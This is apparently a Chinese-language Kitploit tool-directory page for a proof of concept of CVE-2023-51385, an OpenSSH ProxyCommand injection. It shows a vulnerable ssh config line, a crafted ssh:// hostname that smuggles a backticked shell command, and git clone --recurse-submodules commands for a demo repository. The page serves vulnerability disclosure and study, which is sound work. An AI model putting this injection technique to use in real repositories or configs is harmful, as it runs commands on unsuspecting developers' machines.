Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-51385- — CVE-2023-51385 | Kitploit
工具/GitHubGitHub/thinkliving2020/cve-2023-51385-
漏洞分析漏洞利用渗透测试命令与控制学习与教育Payload 开发
GitHubthinkliving2020/cve-2023-51385-

CVE-2023-51385-

CVE-2023-51385

查看仓库
42年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

通过不安全的 ~/.ssh/config 实现远程代码执行 在使用 SSH ProxyCommand 进行隧道和连接代理时,%h、%p 等令牌的使用非常普遍。

易受攻击的配置 host *.example.com ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p 注意:在我最初的评估中,我曾以为使用 '%h`(单引号)可以避免此问题,但看起来类似这样的方式仍然存在漏洞:

ssh://echo helloworld > cve.txt`foo.example.com/bar 来源于:https://man.openbsd.org/ssh_config#ProxyCommand

这个仓库包含什么 一个子模块,可利用此漏洞在 OSX 上弹出计算器。

尝试使用以下命令:

git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules

或者

git clone [email protected]:vin01/poc-proxycommand-vulnerable.git --recurse-submodules

下载工具